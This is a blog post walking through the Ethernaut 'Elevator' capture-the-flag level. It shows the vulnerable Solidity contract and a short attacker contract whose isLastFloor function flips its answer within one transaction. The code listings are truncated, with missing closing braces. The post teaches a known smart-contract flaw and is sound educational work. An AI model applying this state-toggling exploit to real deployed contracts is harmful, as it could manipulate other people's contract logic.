DEV Community

Erhan Tezcan
Erhan Tezcan

Posted on

Ethernaut: 11. Elevator

Play the level

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

interface Building {
  function isLastFloor(uint) external returns (bool);

contract Elevator {
  bool public top;
  uint public floor;

  function goTo(uint _floor) public {
    Building building = Building(msg.sender);

    if (! building.isLastFloor(_floor)) {
      floor = _floor;
      top = building.isLastFloor(floor);
Enter fullscreen mode Exit fullscreen mode

In this level, we will write the Builder contract which the elevator interacts with. However, in the same transaction we will return opposite boolean results for isLastFloor function.

// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.0;

interface Elevator {
  function goTo(uint _floor) external;    

contract Building {
  bool toggleMe = true;

  function isLastFloor(uint) external returns (bool) {
    toggleMe = !toggleMe;
    return toggleMe;

  function callElevator(address _elevator) public {

Enter fullscreen mode Exit fullscreen mode

The problem here is that Elevator did not specify isLastFloor to be a view function, which would prevent us from modifying the state like this. Another attack approach would be to return different results depending on the input data without modifying state, such as via gasLeft().

Top comments (0)